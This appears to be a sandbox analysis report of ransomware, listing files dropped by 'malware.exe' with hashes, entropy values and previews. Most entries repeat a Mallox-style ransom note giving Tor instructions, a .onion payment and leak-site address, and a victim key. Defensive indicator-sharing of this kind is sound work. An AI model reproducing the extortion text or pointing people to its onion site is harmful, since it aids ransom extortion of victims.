                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\24389382-7ab5-43a6-bfac-639d2b409edc\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cookie\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\AcroCef\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):185207
                        Entropy (8bit):7.997419769049959
                        Encrypted:true
                        SSDEEP:3072:MdsC45yhsgLW/E+hbQoq9/bVG4TC4U3lOrEiqEaitj81Lc+Xu2AGo34nj8cLGR5R:es15ychBqdRGcU39iCYjkLD5G1z
                        MD5:9C5EC5B6E2F2F1F4D28BB7A7BC94E5A0
                        SHA1:45EC5C00CB697401F41744DCF87E9F19704F0F2F
                        SHA-256:37DF1D0663F750113ADABDB079882896F5219A93730D39F4284B90B28DD02F01
                        SHA-512:FE2D7AAF04FBE3E579C44B0EBBB50F9349275D915AE741721763DDDF0B7D47DA382C94A2BE46C329DCF837898848FA0E9D9B8374FAF6B2C4CB2FBDAB2B211D39
                        Malicious:true
                        Preview:g5.....{.......d0.sK..v...i.,L..3........(Hu&....^.N.....9..>K.7..tx....|.*...........AV..+=d......p-.&-.i.u..+it....K..!.KU..*<....KVq(g...SA<.b.mA.....P.X.*8."..L.HacS...EU.0....2d...wR.-*....._4.....$.K.....q*yO0.....`...).@./.O'.2_..F....E..u;..[.n.}..R..l..;..O.H....:......v../...kS.....*..Nw....3..H....O.).V>.7...o$....FMI.R..,d=&J......g.ggz..(.R.{.8.K(....?...0NL...'l?....}....z..I..6..Z2...i.. C.@.C[$.....r :^..6.to.C.-H_..&.I......8u=.....}........iv6....sC.!.!.n.#p.3x$...)~...5_.v.&..C.x......'};......L..^..n.Ns.n...4G.X..V<.&p...8!........j.....).....T.xp.k.t..Y2...Wr...,...7.z."........Vm.R..#^.-Lg..'.Ki....!..D.(........qP[%^..&.:.;o.....h7|....Hm......./.z...d.......O..T.P.......`...d/..c..]$g..p5.8.^...-V....5..7b...9..8A.5n.n.D..n6&..2!:ax....c..n...x....d(.u...@6h......#..t...../5s.5@.1.F.i$D.2.c......$.eK.E'..vE..hO...q..gX"t...4.c.....Nuq,T......#....wh...i(....% {5..Q{....=..i..S0.<...Xq.i.*t.t...2P.."....RC... ..

                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):10988
                        Entropy (8bit):7.9818557859336
                        Encrypted:false
                        SSDEEP:192:5tIpREnpGe4wNUhs1oGkUBAzJxXdINHC6uZMW5PfRptq9HwuUhXPXmFxa:5Spip7HNUO1xJSxNwH5up5hj2HwuUV/J
                        MD5:FDEE1C545A0F8118100D7B8961F674B3
                        SHA1:AD787700152C94C2B5E4967C418D1A700028D12B
                        SHA-256:6D227F3B14D93417422B3BB06664F177E23C6DD391FF3522B0014F9A8E06E0F1
                        SHA-512:7E1B16C2DA843BDBA9EE33974528DBC964E7D3A9BD00C61FFA09F9BA2428466EF71FAB1CAB33214E41605BF4B4895047AA109DAEDF7510FE6BD44CF53BEEFD58
                        Malicious:false
                        Preview:nj...3u...T...+....d....s...<.....$.8V..:...k.i\.l.DW-...-AuPR.=....qa0.....4_..c...9.,....._.....$..Q.N....,...Q...K......I.f .+#.R.\j.W=.Au{A.\y.......%.@7..i.m.....H....=....v.....>%;."..,u...^....cM..!.4.`3..}Jv..4........$o.xo.y.!..1.!yX<....2...D.......c.?$v'....).`IP(...d..z.dm.z.....4.<.S..tG .2!.%.o.......[l..&C....u..0..W..7.a@&..F.......C}>..."..5g............>..I.....2$..eR...S.lzd~..9.`.(=...j..<1..:F..7-.e=.n.[.:...?7...h\.2...k.cb........Y,..^U........U...][;.6Z...D.\u._....*.~...Ft`,e..b.....P.....6n.^qi.{...5.0.\A....Z....V.T.........P.7..,...2...>.SC..t..y.W. [.i.m....H..=~v.....<.jw'6.O.B,...[...@...@...p...Z\.l...OU.f..\|..6Q..r.r..Nz.H...4..I.`.RlEo;..3"...k..r.....:.)..JeErZ.....v).%...jqP.7|.X..%.i.}.....5..m...(.q ...F.D..Og.&.1#..w..e.....Z.j|...".S...I...Q......\..LI.fm...,.K.X..vb..|W....XT..|e\.$h..6....-...\.vejy....5..R.-V8rH....#..Y..qV...&.....E.C....P.(V....u+.B.].X..$.g....~..9.H.*gQ..../C.F..{&..

                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):243304
                        Entropy (8bit):7.986235766336052
                        Encrypted:false
                        SSDEEP:3072:S7w4k/FOKB0TskcVM2Db+XjAVSjldlFT8UhrvSH9scK0YF:jFBW7cVMCSjBRhra/KZF
                        MD5:7C8BFAC0717AA4676C6CDAFC2ABBD4AD
                        SHA1:216AD33D0DE932A4D86C53A09577D4A694084D7D
                        SHA-256:D1F130886CE2550658C9EB70745B183E2CA163D7AD20BD714BFF7D89498F039E
                        SHA-512:E2AF5CDC15E90C6A0C78736DD2D311484F3B63E2CE8D87E4EAE73F17E7AEFD66B3E9F3B4789C6A8E991AC69CE7FD3F9A354FDF52482C84D767C0BD919333575E
                        Malicious:false
                        Preview:$..a=g....7._.W:..L.s ....u..."...+...D.g'..s.........c6..n..#.P..6!.pe......*<...C.m.uV.J..%..........;.......c<.L...Wh....... 3.,..7J.3`+..E..g@.H.y(B..{X....K....CU...r...>[.p./=N....H?.=O,...g.......e...b.-[...%hu.."...R.CQ....P.?..t...!s....^q..l.f|&.m.......J..|..g...^...m...8..Q.|.)[.&w.#V.....^..5.2. ...v.T......G....y.iGS....!...r.E......;..@.,J)s....0...+..n......6....1W.(B....0.~7.j..}..H..A.Fx)s..v...w.c.....o.4B^.....W.....T.@2.8.F.,A.4eEY......i.;.S.)].f6m.+8.Q..j...r...jX.../..$6...h.7..8...+.............x2.'.B(.....I.k...3g.....$!#K.y.[.!.sl...V..V....)..h..8..u...V.L:.....I.....D}..x...U....sP...Q.z.1d....Ef..`i.b..ygZI.}.4.M^......J..._.jELT&.}.7(..C8.N%..{....=]....H....*.*.Dt....t....x.-.E..[.s.@*..........{0.Py.N...u.<..?.,:....C.eSj>>....#.&.Xjk.d....s#9...:.x.t.Y..z...^:.u!P..\/t...dD..T..).F.?.0.9+.M...B..c.)..Z..l...ke..wn.RM.J.U.q...k.a.....a...........p......2..,..V.g.....O......+)/...S.......g..x_...t..o.

                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12396
                        Entropy (8bit):7.9864732084366805
                        Encrypted:false
                        SSDEEP:192:fqmM8mIRuVLuiJUenKmVYmLZdN8iRQ6hOv5Kpm62ndEF+geaPnD67XNTXt/FXabE:lmwyU+bdai/Ov5Kpm6mhgeafqXNTpFWE
                        MD5:32F247682B99D17D05A3DBA2A9259611
                        SHA1:82C9D751B814BB86D2154CE2F2014583D85B007E
                        SHA-256:BA19F5FBB4AB9F9D9465C2489178E28B9508DC6187EDD8C3386A0E78B01B811C
                        SHA-512:0AF2F0B8756AE4343F2F118037997A7AE519447FE05DCA3C735C81AE806FFA5E78FDEA65FB189F1B68914564B0A20D2115C4C69BDD1002A443C00DB889017D7D
                        Malicious:false
                        Preview:P.w.2>l,...S.+7......-J.....I.lh..FUq.........#.e.......KFB.N...u.gT{o...*...|.y.....[U...U^.D...X9r.]....YW.PG#t..S.lE.E.b..V...(.........5....'d.1.+A...[..^.95Dk...9.H....N..0...........:vq...H.9.)Hn..)u...a....z..2.K...5[..(........p...\ks.^.......fZ..-.Fq.N.0='...sb.[e2#...B..".zW..Ul....7.y..'.d.@H....A..(w...3.d.DQ2Y.............%_....L..q...O...%....G.X.9...u...B...K"..zQ.)..Q.b~..us...z..I.J..._....."~a..:n....F.z{.It...."..1.!\...Q......9...8.T!...yi..7(9...tb.".."...n.G..b^...u....p.<,....?.m.-k..=M.y..G[5..eP.v...HfY....8x.s..}]N%pe....JE.*../.b..e.Cy.....v....2v0^..f.!...`..i.\..b.^'K6.|f...5.c,V.t..V...."U..7$?.(...yV.*<\V7...[<..J. ..\...c..v.3..S..M........y...n...sx{..m..4^...%....g...]L.....I..,X.n.?..........'4D..2.!^t".@...]*I.>R.3:..[<|.{...y.../MX(..._..)_D.}.b-..s..[.C..;yx8.>C........U..7........fxW...3.........d..T!a...[k`....9..".t?#.R..Y.....T.Lr..j..w....h.LZ.9...).c.*Y...&....MU[.'Z.Y-......4....c..p

                        C:\Users\user\AppData\Local\Adobe\Acrobat\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\Color\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
